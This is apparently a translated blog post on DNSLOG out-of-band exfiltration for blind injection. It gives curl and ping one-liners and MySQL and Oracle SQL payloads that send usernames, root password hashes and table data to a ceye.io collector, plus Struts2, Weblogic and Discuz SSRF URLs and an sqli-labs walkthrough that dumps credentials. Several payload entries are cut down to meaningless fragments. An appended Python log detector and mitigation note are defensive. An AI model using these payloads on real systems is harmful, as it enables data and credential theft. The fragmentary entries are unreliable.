Using DNSLOG in blind injection
0x00 Command Execution
i. *nix:
curl http://ip.port.b182oj.ceye.io/`whoami`
ii. windows
ping %USERNAME%.b182oj.ceye.io
0x01 SQL Injection
i. SQL Server
DECLARE @host varchar(1024);
ii. Oracle
SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
iii. MySQL
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
iv. PostgreSQL
DROP TABLE IF EXISTS table_output;
0x02 XML Entity Injection
0x03 Others
i. Struts2
xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}
ii. FFMpeg
#EXTM3U
iii. Weblogic
xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
iv. ImageMagick
push graphic-context
v. Resin
xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf
vi. Discuz
http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo
Example: MySQL on Windows
step2: query the database name
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select database()),'.lvkais.ceye.io\\abc'))),1,1)--+
step3: query the tables in the current database
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.columns where table_schema='security' limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+
step4: query the data in the table
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_schema=database() and table_name=0x656d61696c73 limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+
step5: get the field names (three versions: query each one separately, and query them concatenated together)
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select username from users limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select password from users limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select concat(username,0x5f,password) from users limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+
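Every payload on this page, from the MySQL LOAD_FILE/CONCAT UNC trick in section 0x01 to the step-by-step walkthrough above, leaves the same two traces on the defender's side: a request parameter that builds a hostname from query output or embeds the collector domain, and a DNS lookup for that hostname leaving the network. The following detector, an added example that is not code from the original post, scans constructed Apache access-log and BIND query-log lines for both traces. The list of collector domains and the log samples are assumptions; lvkais.ceye.io is the collector the page itself uses.

```python
"""Detect DNSLOG-style out-of-band exfiltration in web and DNS logs.

Added example (not from the original post). Two traces are covered:
  1. access log: request targets that build a UNC path with
     LOAD_FILE(CONCAT('\\\\', ...)), call UTL_INADDR.GET_HOST_ADDRESS, or
     embed a known out-of-band collector domain (covers the SSRF cases too);
  2. DNS query log: names under a known collector, or whose left-most label
     looks like hex-encoded data.
"""
import re
from urllib.parse import unquote_plus

# Assumed, partial list of public DNSLOG collectors; extend with your own.
KNOWN_COLLECTORS = ("ceye.io", "dnslog.cn", "burpcollaborator.net")

# Rules run against the URL-decoded request target; first match wins.
REQUEST_RULES = [
    (re.compile(r"load_file\s*\(\s*concat\s*\(\s*'(?:\\\\){2,}", re.I),
     "LOAD_FILE on a CONCAT-built UNC path (MySQL DNSLOG exfil)"),
    (re.compile(r"utl_inaddr\.get_host_address\s*\(", re.I),
     "UTL_INADDR.GET_HOST_ADDRESS call (Oracle DNS lookup)"),
    (re.compile(r"\b[\w.-]+\.(?:" + "|".join(re.escape(c) for c in KNOWN_COLLECTORS) + r")\b", re.I),
     "request embeds a known DNSLOG collector domain"),
]
REQUEST_LINE = re.compile(r'"(?:GET|POST|PUT|HEAD) (\S+) HTTP/')
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")
DNS_QUERY = re.compile(r"query: (\S+) IN ")


def inspect_request(target):
    """Return why a request target is suspicious, or None if it is clean."""
    decoded = unquote_plus(target)  # payloads arrive percent-encoded
    for rule, reason in REQUEST_RULES:
        if rule.search(decoded):
            return reason
    return None


def scan_access_log(lines):
    """Return [(line_number, reason)] for lines carrying a DNSLOG payload."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        reason = inspect_request(m.group(1))
        if reason:
            hits.append((n, reason))
    return hits


def dns_suspicion(qname):
    """Return why a queried name looks like DNSLOG exfil, or None."""
    name = qname.rstrip(".").lower()
    labels = name.split(".")
    for coll in KNOWN_COLLECTORS:
        if name == coll or name.endswith("." + coll):
            return f"lookup under known DNSLOG collector {coll}"
    if HEX_LABEL.match(labels[0]):
        return "left-most label looks like hex-encoded data"
    if len(name) > 100 or len(labels) > 6:
        return "unusually long or deep name"
    return None


def scan_dns_log(lines):
    """Return [(qname, reason)] for suspicious queries in a BIND-style log."""
    hits = []
    for line in lines:
        m = DNS_QUERY.search(line)
        if m and dns_suspicion(m.group(1)):
            hits.append((m.group(1), dns_suspicion(m.group(1))))
    return hits


# Constructed sample logs. Line 2 is the page's "query the database name"
# payload as a browser would percent-encode it; line 3 is a benign decoy.
ACCESS_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /sqli-labs-master/Less-8/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /sqli-labs-master/Less-8/?id=1%27%20and%20if((select%20load_file(concat(%27%5C%5C%5C%5C%27,(select%20database()),%27.lvkais.ceye.io%5C%5Cabc%27))),1,1)--+ HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2024:10:02:30 +0000] "GET /search?q=load_file HTTP/1.1" 200 100
"""
DNS_LOG = """\
12-Mar-2024 10:01:09.120 queries: info: client 10.0.0.20#53211: query: security.lvkais.ceye.io IN A + (10.0.0.2)
12-Mar-2024 10:01:15.003 queries: info: client 10.0.0.20#53212: query: www.example.com IN A + (10.0.0.2)
12-Mar-2024 10:01:20.450 queries: info: client 10.0.0.21#53213: query: deadbeefdeadbeefdeadbeef.oob.example.net IN A + (10.0.0.2)
"""

if __name__ == "__main__":
    for n, reason in scan_access_log(ACCESS_LOG.splitlines()):
        print(f"access log line {n}: {reason}")
    for qname, reason in scan_dns_log(DNS_LOG.splitlines()):
        print(f"dns query {qname}: {reason}")
```

Run against the samples, the detector flags access-log line 2 (the LOAD_FILE/CONCAT UNC path) and the two DNS queries that carry data out (the one under ceye.io and the one whose first label is a hex blob), while the plain `load_file` search term and www.example.com pass. On the MySQL side the page's technique also depends on the server being allowed to read UNC paths; setting `secure_file_priv` to a fixed directory (or empty disabled) removes LOAD_FILE's ability to reach an arbitrary hostname at all, which is the mitigation to check first.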